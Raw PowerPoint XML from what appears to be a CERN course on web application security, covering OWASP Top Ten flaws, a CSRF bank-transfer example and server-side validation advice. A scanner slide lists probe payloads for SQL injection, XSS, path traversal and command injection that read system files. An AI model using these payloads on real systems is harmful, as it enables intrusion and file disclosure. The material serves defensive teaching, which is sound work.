            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>resource is data, devices, the system itself (i.e. its availability)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Security is a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>property</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not a feature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Security is part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reliability</a:t>
            </a:r>
          </a:p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sz="1500" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1" smtClean="0"/>
              <a:t>Building Secure Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>J. Viega, G. McGraw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Focus on Web applications – why?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Web applications are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>often much more useful than desktop software =&gt; popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>publicly available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>easy target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>for attackers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>finding vulnerable sites, automating and scaling attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>easy to develop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>not so easy to develop well and securely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often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>, thus making the server, the database, internal network, data etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insecure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354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Web defacement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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loss of reputation (clients, shareholders)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fear, uncertainty and doubt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information disclosure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(lost data confidentiality)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-544513">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>e.g. business secrets, financial information, client database, medical data, government documents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data loss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (or lost data integrity)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unauthorized access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functionality of the application abused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denial of service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loss of availability or functionality (and revenue)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“foot in the door” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(attacker inside the firewall)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23128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4" descr="Picture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966788"/>
            <a:ext cx="8081963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incident in September 2008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3" y="4629150"/>
            <a:ext cx="5186362" cy="1585913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5688" y="4306888"/>
            <a:ext cx="4137025" cy="1963737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39386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OWASP Top Ten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3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Open Web Application Security Project)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Top Ten flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://owasp.org/index.php/Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRP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A2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication and Session Management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A3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Site Scripting (XSS)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A4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Direct Object References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A5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misconfiguration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A6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Exposure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A7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function Level Access Control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A8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Site Request Forgery (CSRF)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A9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Components with Known Vulnerabilities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A10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unvalidated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en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirects and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92164" name="Picture 4" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.05 - CERN course\materials\owasp-logo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9346" y="0"/>
            <a:ext cx="2816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066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A8: Cross-site request forgery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solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (CSRF) – a scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Alice logs in at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, and forgets to log out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Alice then visits a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>evil.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> (or just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>webforums.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>), with:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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img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http://bank.com/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transfer?amount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=1000000&amp;to_account=123456789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"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Alice‘s browser wants to display the image, so sends </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>a request to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, without Alice’s consent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>if Alice is still logged in, then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 accepts the request and performs the action, transparently for Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(!)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>There is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no simple solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, but the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>help:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2100" dirty="0" smtClean="0"/>
              <a:t>expire early user sessions, encourage users to log out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>use “double submit” cookies and/or secret hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>use POST rather than GET, and check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> value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3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3349625" y="179388"/>
            <a:ext cx="1865313" cy="6921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7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Client-server –  no trust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Security on the client side doesn’t work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> (and cannot)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>don’t rely on the client to perform security checks (validation etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>e.g.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&lt;input type=”text” maxlength=”20”&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>authentication should be done on the server side, not by the client </a:t>
            </a:r>
          </a:p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Don’t trust your client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>HTTP response header fields like referrer, cookies etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>HTTP query string values (from hidden fields or explicit links)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>e.g.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&lt;input type=”hidden” name=”price” value=”299”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>in an online shop can (and will!) be abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do all security-related checks on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Don’t expect your clients to send you SQL queries, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>shell commands etc. to execute – it’s not your code anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Put limits on the number of connections, set timeouts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99454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6" grpId="0" animBg="1"/>
      <p:bldP spid="89092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scanning tools – how they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1. Crawling			2. Scanning		3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>eporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109571" name="Picture 3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\2009\2009-10 HEPiX\presentations\Web application security\materials\magnifying-gla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654" y="3284984"/>
            <a:ext cx="210978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0" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\2009\2009-10 HEPiX\presentations\Web application security\materials\searchology-web-grap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39" y="3284984"/>
            <a:ext cx="297180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2" name="Picture 4" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\2009\2009-10 HEPiX\presentations\Web application security\materials\repor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990" y="3284984"/>
            <a:ext cx="169545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4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scanning - HTTP requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603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200" dirty="0" smtClean="0"/>
              <a:t>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c:\\boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>../../../../../../../../../../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../../../../../../../../../../boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>a;env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a);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>env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/e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>¿'"(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>sleep(4)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>1+and+sleep(4)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>and+sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(4)='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>and+sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4)="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;waitfor+delay+'0:0:4'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"));waitfor+delay+'0:0:4'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>benchmark(1000, MD5(1))#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>1))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>and+benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(10000000,MD5(1))#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>and+pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604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200" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SCrIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fake_alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("TbBPEYaN3gA72vQAlao1")&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SCrIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>|+ping+-c+4+localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>run+ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>+-n+3+localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp;+type+%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;+type+%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>`/bin/cat+/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r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>run+type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>+%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>b"+OR+"81"="81</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>http://w3af.sourceforge.net/w3af/remoteFileInclude.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
